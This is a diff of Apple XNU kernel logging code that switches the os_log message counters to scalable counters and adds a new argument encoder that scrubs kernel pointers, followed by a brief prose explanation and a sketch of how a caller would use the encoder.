        match_count = find_pattern_in_buffer(databuffer, datalen, total_seqno);
        T_EXPECT_EQ_ULONG(match_count, total_seqno, "verify oslog_info does not go to systemlog buffer");
 
-       total_msg = oslog_p_total_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
        test_oslog_info_helper(uniqid, 10);
-       T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_info_helper: Should have seen 10 msgs");
+       T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_info_helper: Should have seen 10 msgs");
 
-       total_msg = oslog_p_total_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
        test_oslog_debug_helper(uniqid, 10);
-       T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_debug_helper:Should have seen 10 msgs");
+       T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_debug_helper:Should have seen 10 msgs");
 
-       total_msg = oslog_p_total_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
        test_oslog_error_helper(uniqid, 10);
-       T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_error_helper:Should have seen 10 msgs");
+       T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_error_helper:Should have seen 10 msgs");
 
-       total_msg = oslog_p_total_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
        test_oslog_default_helper(uniqid, 10);
-       T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_default_helper:Should have seen 10 msgs");
+       T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_default_helper:Should have seen 10 msgs");
 
-       total_msg = oslog_p_total_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
        test_oslog_fault_helper(uniqid, 10);
-       T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_fault_helper:Should have seen 10 msgs");
+       T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_fault_helper:Should have seen 10 msgs");
 
-       T_LOG("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount,
-           oslog_p_dropped_msgcount);
+       T_LOG("oslog internal counters total %u , saved %u, dropped %u", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount),
+           counter_load(&oslog_p_dropped_msgcount));
 
        return KERN_SUCCESS;
 }
@@ -945,8 +872,8 @@ test_os_log_parallel(void)
        kern_return_t kr;
        uint32_t uniqid = RandomULong();
 
-       printf("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount,
-           oslog_p_dropped_msgcount);
+       printf("oslog internal counters total %lld , saved %lld, dropped %lld", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount),
+           counter_load(&oslog_p_dropped_msgcount));
 
        kr = kernel_thread_start(_test_log_loop, NULL, &thread[0]);
        T_ASSERT_EQ_INT(kr, KERN_SUCCESS, "kernel_thread_start returned successfully");
@@ -964,8 +891,8 @@ test_os_log_parallel(void)
        thread_deallocate(thread[0]);
        thread_deallocate(thread[1]);
 
-       T_LOG("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount,
-           oslog_p_dropped_msgcount);
+       T_LOG("oslog internal counters total %lld , saved %lld, dropped %lld", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount),
+           counter_load(&oslog_p_dropped_msgcount));
        T_PASS("parallel_logging tests is now complete");
 
        return KERN_SUCCESS;
@@ -981,9 +908,9 @@ test_oslog_handleOSLogCtl(int32_t * in, int32_t * out, int32_t len)
        case 1:
        {
                /* send out counters */
-               out[1] = oslog_p_total_msgcount;
-               out[2] = oslog_p_saved_msgcount;
-               out[3] = oslog_p_dropped_msgcount;
+               out[1] = counter_load(&oslog_p_total_msgcount);
+               out[2] = counter_load(&oslog_p_saved_msgcount);
+               out[3] = counter_load(&oslog_p_dropped_msgcount);
                out[0] = KERN_SUCCESS;
                break;
        }
@@ -1035,16 +962,16 @@ kern_return_t
 test_stresslog_dropmsg(uint32_t uniqid)
 {
        uint32_t total, saved, dropped;
-       total = oslog_p_total_msgcount;
-       saved = oslog_p_saved_msgcount;
-       dropped = oslog_p_dropped_msgcount;
+       total = counter_load(&oslog_p_total_msgcount);
+       saved = counter_load(&oslog_p_saved_msgcount);
+       dropped = counter_load(&oslog_p_dropped_msgcount);
        uniqid = RandomULong();
        test_oslog_debug_helper(uniqid, 100);
-       while ((oslog_p_dropped_msgcount - dropped) == 0) {
+       while ((counter_load(&oslog_p_dropped_msgcount) - dropped) == 0) {
                test_oslog_debug_helper(uniqid, 100);
        }
-       printf("test_stresslog_dropmsg: logged %u msgs, saved %u and caused a drop of %u msgs. \n", oslog_p_total_msgcount - total,
-           oslog_p_saved_msgcount - saved, oslog_p_dropped_msgcount - dropped);
+       printf("test_stresslog_dropmsg: logged %lld msgs, saved %lld and caused a drop of %lld msgs. \n", counter_load(&oslog_p_total_msgcount) - total,
+           counter_load(&oslog_p_saved_msgcount) - saved, counter_load(&oslog_p_dropped_msgcount) - dropped);
        return KERN_SUCCESS;
 }
 
diff --git a/libkern/os/log_encode.c b/libkern/os/log_encode.c
new file mode 100644 (file)
index 0000000..5c2e2e9
--- /dev/null
@@ -0,0 +1,603 @@
+/*
+ * Copyright (c) 2015-2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this
+ * file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_LICENSE_HEADER_END@
+ */
+
+#include <stdbool.h>
+#include <firehose/tracepoint_private.h>
+#include <kern/assert.h>
+#include <kern/counter.h>
+#include <kern/locks.h>
+#include <pexpert/pexpert.h>
+#include <sys/param.h>
+
+#if __has_feature(ptrauth_calls)
+#include <mach/vm_param.h>
+#include <ptrauth.h>
+#endif /* __has_feature(ptrauth_calls) */
+
+#include "log_encode.h"
+#include "log_mem.h"
+
+#define isdigit(ch) (((ch) >= '0') && ((ch) <= '9'))
+#define log_context_cursor(ctx) &(ctx)->ctx_hdr->hdr_data[(ctx)->ctx_content_off]
+
+extern boolean_t doprnt_hide_pointers;
+
+SCALABLE_COUNTER_DEFINE(oslog_p_fmt_invalid_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_fmt_max_args_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_truncated_msgcount);
+
+static bool
+is_kernel_pointer(void *arg, size_t arg_len)
+{
+       if (arg_len < sizeof(void *)) {
+               return false;
+       }
+
+       unsigned long long value = 0;
+       assert(arg_len <= sizeof(value));
+       (void) memcpy(&value, arg, arg_len);
+
+#if __has_feature(ptrauth_calls)
+       /**
+        * Strip out the pointer authentication code before
+        * checking whether the pointer is a kernel address.
+        */
+       value = (unsigned long long)VM_KERNEL_STRIP_PTR(value);
+#endif /* __has_feature(ptrauth_calls) */
+
+       return value >= VM_MIN_KERNEL_AND_KEXT_ADDRESS && value <= VM_MAX_KERNEL_ADDRESS;
+}
+
+static void
+log_context_cursor_advance(os_log_context_t ctx, size_t amount)
+{
+       ctx->ctx_content_off += amount;
+       assert(log_context_cursor(ctx) <= (ctx->ctx_buffer + ctx->ctx_buffer_sz));
+}
+
+static bool
+log_fits(os_log_context_t ctx, size_t data_size)
+{
+       return (ctx->ctx_content_off + data_size) <= ctx->ctx_content_sz;
+}
+
+static bool
+log_fits_cmd(os_log_context_t ctx, size_t data_size)
+{
+       return log_fits(ctx, sizeof(*ctx->ctx_hdr) + data_size);
+}
+
+static void
+log_range_update(os_log_fmt_range_t range, uint16_t offset, uint16_t length)
+{
+       range->offset = offset;
+       /*
+        * Truncated flag may have already been set earlier, hence do not
+        * overwrite it blindly.
+        */
+       if (length < range->length) {
+               range->truncated = true;
+       }
+       range->length = length;
+}
+
+/*
+ * Stores a command in the main section. The value itself is wrapped in
+ * the os_log_fmt_cmd_t struct.
+ */
+static void
+log_add_cmd(os_log_context_t ctx, os_log_fmt_cmd_type_t type, uint8_t flags,
+    void *arg, size_t arg_size)
+{
+       os_log_fmt_cmd_t cmd;
+       const size_t cmd_sz = sizeof(*cmd) + arg_size;
+
+       assert(log_fits_cmd(ctx, cmd_sz));
+       assert(arg_size <= UINT8_MAX);
+
+       cmd = (os_log_fmt_cmd_t)log_context_cursor(ctx);
+       cmd->cmd_type = type;
+       cmd->cmd_flags = flags;
+       cmd->cmd_size = (uint8_t)arg_size;
+       (void) memcpy(cmd->cmd_data, arg, cmd->cmd_size);
+
+       assert(cmd_sz == sizeof(*cmd) + cmd->cmd_size);
+       log_context_cursor_advance(ctx, cmd_sz);
+}
+
+/*
+ * Collect details about argument which needs to be stored in the pubdata
+ * section.
+ */
+static void
+log_collect_public_range_data(os_log_context_t ctx, os_log_fmt_range_t range, void *arg)
+{
+       ctx->ctx_pubdata[ctx->ctx_pubdata_cnt++] = (char *)arg;
+       ctx->ctx_pubdata_sz += range->length;
+}
+
+static void
+log_add_range_data(os_log_context_t ctx, os_log_fmt_range_t range, void *arg)
+{
+       assert(log_fits(ctx, range->length));
+       (void) memcpy(log_context_cursor(ctx), arg, range->length);
+       log_context_cursor_advance(ctx, range->length);
+}
+
+static struct os_log_fmt_range_s
+log_create_range(os_log_context_t ctx, size_t arg_len)
+{
+       const size_t final_arg_len = MIN(arg_len, UINT16_MAX);
+
+       return (struct os_log_fmt_range_s) {
+                      .offset = ctx->ctx_pubdata_sz,
+                      .length = (uint16_t)final_arg_len,
+                      .truncated = (final_arg_len < arg_len)
+       };
+}
+
+static int
+log_add_range_arg(os_log_context_t ctx, os_log_fmt_cmd_type_t type, os_log_fmt_cmd_flags_t flags,
+    void *arg, size_t arg_len)
+{
+       struct os_log_fmt_range_s range;
+
+       if (!log_fits_cmd(ctx, sizeof(range))) {
+               return ENOMEM;
+       }
+
+       range = log_create_range(ctx, arg_len);
+
+       if (flags == OSLF_CMD_FLAG_PUBLIC) {
+               if (ctx->ctx_pubdata_cnt == OS_LOG_MAX_PUB_ARGS) {
+                       return ENOMEM;
+               }
+               assert(ctx->ctx_pubdata_cnt < OS_LOG_MAX_PUB_ARGS);
+               log_collect_public_range_data(ctx, &range, arg);
+       }
+       log_add_cmd(ctx, type, flags, &range, sizeof(range));
+       ctx->ctx_hdr->hdr_cmd_cnt++;
+
+       return 0;
+}
+
+/*
+ * Adds a scalar argument value to the main section.
+ */
+static int
+log_add_arg(os_log_context_t ctx, os_log_fmt_cmd_type_t type, void *arg, size_t arg_len)
+{
+       assert(type == OSLF_CMD_TYPE_COUNT || type == OSLF_CMD_TYPE_SCALAR);
+       assert(arg_len < UINT16_MAX);
+
+       if (log_fits_cmd(ctx, arg_len)) {
+               log_add_cmd(ctx, type, OSLF_CMD_FLAG_PUBLIC, arg, arg_len);
+               ctx->ctx_hdr->hdr_cmd_cnt++;
+               return 0;
+       }
+
+       return ENOMEM;
+}
+
+static void
+log_encode_public_data(os_log_context_t ctx)
+{
+       const uint16_t orig_content_off = ctx->ctx_content_off;
+       os_log_fmt_hdr_t const hdr = ctx->ctx_hdr;
+       os_log_fmt_cmd_t cmd = (os_log_fmt_cmd_t)hdr->hdr_data;
+
+       assert(ctx->ctx_pubdata_cnt <= hdr->hdr_cmd_cnt);
+
+       for (int i = 0, pub_i = 0; i < hdr->hdr_cmd_cnt; i++, cmd = (os_log_fmt_cmd_t)(cmd->cmd_data + cmd->cmd_size)) {
+               if (cmd->cmd_type != OSLF_CMD_TYPE_STRING) {
+                       continue;
+               }
+
+               os_log_fmt_range_t const range __attribute__((aligned(8))) = (os_log_fmt_range_t)&cmd->cmd_data;
+
+               // Fix offset and length of the argument data in the hdr.
+               log_range_update(range, ctx->ctx_content_off - orig_content_off,
+                   MIN(range->length, ctx->ctx_content_sz - ctx->ctx_content_off));
+
+               if (range->truncated) {
+                       ctx->ctx_truncated = true;
+               }
+
+               assert(pub_i < ctx->ctx_pubdata_cnt);
+               log_add_range_data(ctx, range, ctx->ctx_pubdata[pub_i++]);
+       }
+}
+
+static bool
+log_expand(os_log_context_t ctx, size_t new_size)
+{
+       assert(new_size > ctx->ctx_buffer_sz);
+
+       if (!oslog_is_safe()) {
+               return false;
+       }
+
+       size_t final_size = new_size;
+
+       void *buf = logmem_alloc(ctx->ctx_logmem, &final_size);
+       if (!buf) {
+               return false;
+       }
+       assert(final_size >= new_size);
+
+       // address length header + already stored data
+       const size_t hdr_size = (uint8_t *)ctx->ctx_hdr - ctx->ctx_buffer;
+       const size_t copy_size = hdr_size + sizeof(*ctx->ctx_hdr) + ctx->ctx_content_sz;
+       assert(copy_size <= new_size);
+       (void) memcpy(buf, ctx->ctx_buffer, copy_size);
+
+       if (ctx->ctx_allocated) {
+               logmem_free(ctx->ctx_logmem, ctx->ctx_buffer, ctx->ctx_buffer_sz);
+       }
+
+       ctx->ctx_buffer = buf;
+       ctx->ctx_buffer_sz = final_size;
+       ctx->ctx_content_sz = (uint16_t)(ctx->ctx_buffer_sz - hdr_size - sizeof(*ctx->ctx_hdr));
+       ctx->ctx_hdr = (os_log_fmt_hdr_t)&ctx->ctx_buffer[hdr_size];
+       ctx->ctx_allocated = true;
+
+       return true;
+}
+
+static int
+log_encode_fmt_arg(void *arg, size_t arg_len, os_log_fmt_cmd_type_t type, os_log_context_t ctx)
+{
+       int rc = 0;
+
+       switch (type) {
+       case OSLF_CMD_TYPE_COUNT:
+       case OSLF_CMD_TYPE_SCALAR:
+               // Scrub kernel pointers.
+               if (doprnt_hide_pointers && is_kernel_pointer(arg, arg_len)) {
+                       rc = log_add_range_arg(ctx, type, OSLF_CMD_FLAG_PRIVATE, NULL, 0);
+                       ctx->ctx_hdr->hdr_flags |= OSLF_HDR_FLAG_HAS_PRIVATE;
+               } else {
+                       rc = log_add_arg(ctx, type, arg, arg_len);
+               }
+               break;
+       case OSLF_CMD_TYPE_STRING:
+               rc = log_add_range_arg(ctx, type, OSLF_CMD_FLAG_PUBLIC, arg, arg_len);
+               ctx->ctx_hdr->hdr_flags |= OSLF_HDR_FLAG_HAS_NON_SCALAR;
+               break;
+       default:
+               panic("Unsupported log value type");
+       }
+
+       return rc;
+}
+
+static int
+log_encode_fmt(os_log_context_t ctx, const char *format, va_list args)
+{
+       const char *percent = strchr(format, '%');
+
+       while (percent != NULL) {
+               ++percent;
+
+               if (percent[0] == '%') {
+                       percent = strchr(percent + 1, '%'); // Find next format after %%
+                       continue;
+               }
+
+               struct os_log_format_value_s value;
+               int     type = OST_INT;
+               int     prec = 0;
+               char    ch;
+
+               for (bool done = false; !done; percent++) {
+                       int err = 0;
+
+                       switch (ch = percent[0]) {
+                       /* type of types or other */
+                       case 'l': // longer
+                               type++;
+                               break;
+
+                       case 'h': // shorter
+                               type--;
+                               break;
+
+                       case 'z':
+                               type = OST_SIZE;
+                               break;
+
+                       case 'j':
+                               type = OST_INTMAX;
+                               break;
+
+                       case 't':
+                               type = OST_PTRDIFF;
+                               break;
+
+                       case 'q':
+                               type = OST_LONGLONG;
+                               break;
+
+                       case '.': // precision
+                               if ((percent[1]) == '*') {
+                                       prec = va_arg(args, int);
+                                       err = log_encode_fmt_arg(&prec, sizeof(prec), OSLF_CMD_TYPE_COUNT, ctx);
+                                       if (slowpath(err)) {
+                                               return err;
+                                       }
+                                       percent++;
+                                       continue;
+                               } else {
+                                       // we have to read the precision and do the right thing
+                                       const char *fmt = percent + 1;
+                                       prec = 0;
+                                       while (isdigit(ch = *fmt++)) {
+                                               prec = 10 * prec + (ch - '0');
+                                       }
+
+                                       if (prec > 1024) {
+                                               prec = 1024;
+                                       }
+
+                                       err = log_encode_fmt_arg(&prec, sizeof(prec), OSLF_CMD_TYPE_COUNT, ctx);
+                               }
+                               break;
+
+                       case '-': // left-align
+                       case '+': // force sign
+                       case ' ': // prefix non-negative with space
+                       case '#': // alternate
+                       case '\'': // group by thousands
+                               break;
+
+                       /* fixed types */
+                       case 'd': // integer
+                       case 'i': // integer
+                       case 'o': // octal
+                       case 'u': // unsigned
+                       case 'x': // hex
+                       case 'X': // upper-hex
+                               switch (type) {
+                               case OST_CHAR:
+                                       value.type.ch = (char) va_arg(args, int);
+                                       err = log_encode_fmt_arg(&value.type.ch, sizeof(value.type.ch), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_SHORT:
+                                       value.type.s = (short) va_arg(args, int);
+                                       err = log_encode_fmt_arg(&value.type.s, sizeof(value.type.s), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_INT:
+                                       value.type.i = va_arg(args, int);
+                                       err = log_encode_fmt_arg(&value.type.i, sizeof(value.type.i), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_LONG:
+                                       value.type.l = va_arg(args, long);
+                                       err = log_encode_fmt_arg(&value.type.l, sizeof(value.type.l), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_LONGLONG:
+                                       value.type.ll = va_arg(args, long long);
+                                       err = log_encode_fmt_arg(&value.type.ll, sizeof(value.type.ll), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_SIZE:
+                                       value.type.z = va_arg(args, size_t);
+                                       err = log_encode_fmt_arg(&value.type.z, sizeof(value.type.z), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_INTMAX:
+                                       value.type.im = va_arg(args, intmax_t);
+                                       err = log_encode_fmt_arg(&value.type.im, sizeof(value.type.im), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_PTRDIFF:
+                                       value.type.pd = va_arg(args, ptrdiff_t);
+                                       err = log_encode_fmt_arg(&value.type.pd, sizeof(value.type.pd), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               default:
+                                       return EINVAL;
+                               }
+                               done = true;
+                               break;
+
+                       case 'p': // pointer
+                               value.type.p = va_arg(args, void *);
+                               err = log_encode_fmt_arg(&value.type.p, sizeof(value.type.p), OSLF_CMD_TYPE_SCALAR, ctx);
+                               done = true;
+                               break;
+
+                       case 'c': // char
+                               value.type.ch = (char) va_arg(args, int);
+                               err = log_encode_fmt_arg(&value.type.ch, sizeof(value.type.ch), OSLF_CMD_TYPE_SCALAR, ctx);
+                               done = true;
+                               break;
+
+                       case 's': // string
+                               value.type.pch = va_arg(args, char *);
+                               if (prec == 0 && value.type.pch) {
+                                       prec = (int) strlen(value.type.pch) + 1;
+                               }
+                               err = log_encode_fmt_arg(value.type.pch, prec, OSLF_CMD_TYPE_STRING, ctx);
+                               prec = 0;
+                               done = true;
+                               break;
+
+                       case 'm':
+                               value.type.i = 0; // Does %m make sense in the kernel?
+                               err = log_encode_fmt_arg(&value.type.i, sizeof(value.type.i), OSLF_CMD_TYPE_SCALAR, ctx);
+                               done = true;
+                               break;
+
+                       default:
+                               if (isdigit(ch)) { // [0-9]
+                                       continue;
+                               }
+                               return EINVAL;
+                       }
+
+                       if (slowpath(err)) {
+                               return err;
+                       }
+
+                       if (done) {
+                               percent = strchr(percent, '%'); // Find next format
+                               break;
+                       }
+               }
+       }
+
+       return 0;
+}
+
+static inline size_t
+write_address_location(uint8_t buf[static sizeof(uint64_t)],
+    void *dso, const void *address, firehose_tracepoint_flags_t *flags, bool driverKit)
+{
+       uintptr_t shift_addr = (uintptr_t)address - (uintptr_t)dso;
+
+       kc_format_t kcformat = KCFormatUnknown;
+       __assert_only bool result = PE_get_primary_kc_format(&kcformat);
+       assert(result);
+
+       if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) {
+               *flags = _firehose_tracepoint_flags_pc_style_shared_cache;
+               memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t));
+               return sizeof(uint32_t);
+       }
+
+       /*
+        * driverKit will have the dso set as MH_EXECUTE (it is logging from a
+        * syscall in the kernel) but needs logd to parse the address as an
+        * absolute pc.
+        */
+       kernel_mach_header_t *mh = dso;
+       if (mh->filetype == MH_EXECUTE && !driverKit) {
+               *flags = _firehose_tracepoint_flags_pc_style_main_exe;
+               memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t));
+               return sizeof(uint32_t);
+       }
+
+       *flags = _firehose_tracepoint_flags_pc_style_absolute;
+       shift_addr = driverKit ? (uintptr_t)address : VM_KERNEL_UNSLIDE(address);
+       size_t len = sizeof(uintptr_t);
+
+#if __LP64__
+       len = 6; // 48 bits are enough
+#endif
+       memcpy(buf, (uintptr_t[]){ shift_addr }, len);
+
+       return len;
+}
+
+static void
+os_log_encode_location(os_log_context_t ctx, void *addr, void *dso, bool driverKit,
+    firehose_tracepoint_flags_t *ft_flags)
+{
+       const size_t hdr_size = write_address_location(ctx->ctx_buffer, dso, addr, ft_flags, driverKit);
+       ctx->ctx_hdr = (os_log_fmt_hdr_t)&ctx->ctx_buffer[hdr_size];
+       ctx->ctx_content_sz = (uint16_t)(ctx->ctx_buffer_sz - hdr_size - sizeof(*ctx->ctx_hdr));
+}
+
+/*
+ * Encodes argument (meta)data into a format consumed by libtrace. Stores
+ * metadata for all arguments first; the metadata also includes scalar argument
+ * values. A second step then saves data that is encoded separately from its
+ * metadata (such as strings).
+ */
+bool
+os_log_context_encode(os_log_context_t ctx, const char *fmt, va_list args, void *addr, void *dso, bool driverKit)
+{
+       os_log_encode_location(ctx, addr, dso, driverKit, &ctx->ctx_ft_flags);
+
+       va_list args_copy;
+       va_copy(args_copy, args);
+
+       int rc = log_encode_fmt(ctx, fmt, args);
+
+       va_end(args_copy);
+
+       switch (rc) {
+       case EINVAL:
+               // Bogus/Unsupported fmt string
+               counter_inc(&oslog_p_fmt_invalid_msgcount);
+               return false;
+       case ENOMEM:
+               /*
+                * The fmt contains an unreasonable number of arguments (> 32)
+                * and we ran out of space. We could call log_expand() here and
+                * retry. However, format strings like that look more like a
+                * misuse of the logging system, hence the error.
+                */
+               counter_inc(&oslog_p_fmt_max_args_msgcount);
+               return false;
+       case 0:
+               break;
+       default:
+               panic("unhandled return value");
+       }
+
+       if (ctx->ctx_pubdata_sz == 0) {
+               goto finish;
+       }
+
+       if (!log_fits(ctx, ctx->ctx_pubdata_sz)) {
+               size_t space_needed = log_context_cursor(ctx) + ctx->ctx_pubdata_sz - ctx->ctx_buffer;
+               space_needed = MIN(space_needed, logmem_max_size(ctx->ctx_logmem));
+               (void) log_expand(ctx, space_needed);
+       }
+
+       log_encode_public_data(ctx);
+
+       if (ctx->ctx_truncated) {
+               counter_inc(&oslog_p_truncated_msgcount);
+       }
+finish:
+       ctx->ctx_content_sz = (uint16_t)(log_context_cursor(ctx) - ctx->ctx_buffer);
+       ctx->ctx_content_off = 0;
+       return true;
+}
+
+void
+os_log_context_init(os_log_context_t ctx, logmem_t *logmem, uint8_t *buffer, size_t buffer_sz)
+{
+       assert(logmem);
+       assert(buffer);
+       assert(buffer_sz > 0);
+
+       bzero(ctx, sizeof(*ctx));
+       ctx->ctx_logmem = logmem;
+       ctx->ctx_buffer = buffer;
+       ctx->ctx_buffer_sz = buffer_sz;
+}
+
+void
+os_log_context_free(os_log_context_t ctx)
+{
+       if (ctx->ctx_allocated) {
+               logmem_free(ctx->ctx_logmem, ctx->ctx_buffer, ctx->ctx_buffer_sz);
+       }
+}
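
The new file boils down to a three-call lifecycle: os_log_context_init() with a caller-supplied scratch buffer and a logmem pool, os_log_context_encode() for the format string and arguments, and os_log_context_free() to release any larger buffer that log_expand() pulled from logmem. A rough sketch of a caller, with hypothetical names and buffer size (the actual call sites are not shown in this excerpt):

#include <stdarg.h>
#include "log_encode.h"        /* declares the three functions used below */

static bool
example_encode_log(logmem_t *lm, const char *fmt, va_list args, void *addr, void *dso)
{
        uint8_t scratch[128];                      /* size chosen arbitrarily for the sketch */
        struct os_log_context_s ctx;

        os_log_context_init(&ctx, lm, scratch, sizeof(scratch));

        /* Returns false on a rejected format string (EINVAL) or too many arguments (ENOMEM). */
        bool ok = os_log_context_encode(&ctx, fmt, args, addr, dso, false);
        if (ok) {
                /* ctx.ctx_buffer / ctx.ctx_content_sz now hold the encoded tracepoint payload. */
        }

        os_log_context_free(&ctx);                 /* frees a log_expand()'d buffer, if any */
        return ok;
}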
index 82f2ac21d12e59331c511c8a5e5b66b260e9fb7f..40be98626d92477a5eb41d83c7e7619f2ea332f9 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2015-2016 Apple Inc. All rights reserved.
+ * Copyright (c) 2015-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_LICENSE_HEADER_START@
  *
 #define log_encode_h
 
 #include "log_encode_types.h"
-#include <sys/param.h>
 
-#if __has_feature(ptrauth_calls)
-#include <mach/vm_param.h>
-#include <ptrauth.h>
-#endif /* __has_feature(ptrauth_calls) */
-
-#ifdef KERNEL
-#define isdigit(ch) (((ch) >= '0') && ((ch) <= '9'))
-extern boolean_t doprnt_hide_pointers;
-#endif
-
-static bool
-_encode_data(os_log_buffer_value_t content, const void *arg, size_t arg_len, os_log_buffer_context_t context)
-{
-       struct os_log_arginfo_s arginfo;
-       void *databuf;
-
-       arg_len = MIN(arg_len, UINT16_MAX);
-
-       if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) {
-               databuf = context->privdata + context->privdata_off;
-               arginfo.length = MIN((uint16_t)arg_len, (context->privdata_sz - context->privdata_off));
-               arginfo.offset = context->privdata_off;
-       } else {
-               databuf = context->pubdata + context->pubdata_off;
-               arginfo.length = MIN((uint16_t)arg_len, (context->pubdata_sz - context->pubdata_off));
-               arginfo.offset = context->pubdata_off;
-       }
-
-       if (context->arg_content_sz > 0) {
-               arginfo.length = MIN((uint16_t)context->arg_content_sz, arginfo.length);
-       }
-
-       memcpy(content->value, &arginfo, sizeof(arginfo));
-       content->size = sizeof(arginfo);
-
-       if (arginfo.length) {
-               if (content->type == OS_LOG_BUFFER_VALUE_TYPE_STRING
-#ifndef KERNEL
-                   || content->type == OS_LOG_BUFFER_VALUE_TYPE_OBJECT
-#endif
-                   ) {
-                       strlcpy(databuf, arg, arginfo.length);
-               } else {
-                       memcpy(databuf, arg, arginfo.length);
-               }
-       }
-
-       if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) {
-               context->privdata_off += arginfo.length;
-       } else {
-               context->pubdata_off += arginfo.length;
-       }
-
-       context->content_off += sizeof(*content) + content->size;
-       context->arg_content_sz = 0;
-
-       return true;
-}
-
-#ifndef KERNEL
-static void
-_os_log_parse_annotated(char *annotated, const char **visibility, const char **library, const char **type)
-{
-       char *values[3] = { NULL };
-       int cnt = 0;
-       int idx = 0;
-
-       for (; cnt < 3;) {
-               char *token = strsep(&annotated, ", {}");
-               if (token == NULL) {
-                       break;
-               }
-
-               if (*token == '\0') {
-                       continue;
-               }
-
-               values[cnt++] = token;
-       }
-
-       if ((cnt > 0) && (!strcmp(values[0], "public") || !strcmp(values[0], "private"))) {
-               if (visibility != NULL) {
-                       (*visibility) = values[0];
-               }
-
-               idx++;
-       }
-
-       if (idx < cnt && (library != NULL) && (type != NULL)) {
-               char *decoder = values[idx];
-
-               for (cnt = 0; cnt < 3;) {
-                       char *token = strsep(&decoder, ": {}");
-                       if (token == NULL) {
-                               break;
-                       }
-
-                       if (*token == '\0') {
-                               continue;
-                       }
-
-                       values[cnt++] = token;
-               }
-
-               if (cnt == 2) {
-                       (*library) = values[0];
-                       (*type) = values[1];
-               }
-
-               if (cnt == 1) {
-                       (*library) = "builtin";
-                       (*type) = values[0];
-               }
-       }
-}
-#endif /* !KERNEL */
-
-OS_ALWAYS_INLINE
-static inline bool
-_os_log_encode_arg(void *arg, size_t arg_len, os_log_value_type_t ctype, bool is_private, os_log_buffer_context_t context)
-{
-       os_log_buffer_value_t content = (os_log_buffer_value_t) &context->buffer->content[context->content_off];
-       size_t content_sz = sizeof(*content) + arg_len;
-       char tempString[OS_LOG_BUFFER_MAX_SIZE] = {};
-#ifndef KERNEL
-       bool obj_private = true;
-#endif
-
-#ifdef KERNEL
-       /* scrub kernel pointers */
-       if (doprnt_hide_pointers &&
-           ctype == OS_LOG_BUFFER_VALUE_TYPE_SCALAR &&
-           arg_len >= sizeof(void *)) {
-               unsigned long long value = 0;
-               memcpy(&value, arg, arg_len);
-
-#if __has_feature(ptrauth_calls)
-               /**
-                * Strip out the pointer authentication code before
-                * checking whether the pointer is a kernel address.
-                */
-               value = (unsigned long long)VM_KERNEL_STRIP_PTR(value);
-#endif /* __has_feature(ptrauth_calls) */
-
-               if (value >= VM_MIN_KERNEL_AND_KEXT_ADDRESS && value <= VM_MAX_KERNEL_ADDRESS) {
-                       is_private = true;
-                       bzero(arg, arg_len);
-               }
-       }
-#endif
-
-       content->type = ctype;
-       content->flags = (is_private ? OS_LOG_CONTENT_FLAG_PRIVATE : 0);
-
-#ifndef KERNEL
-       if (context->annotated != NULL) {
-               const char *visibility = NULL;
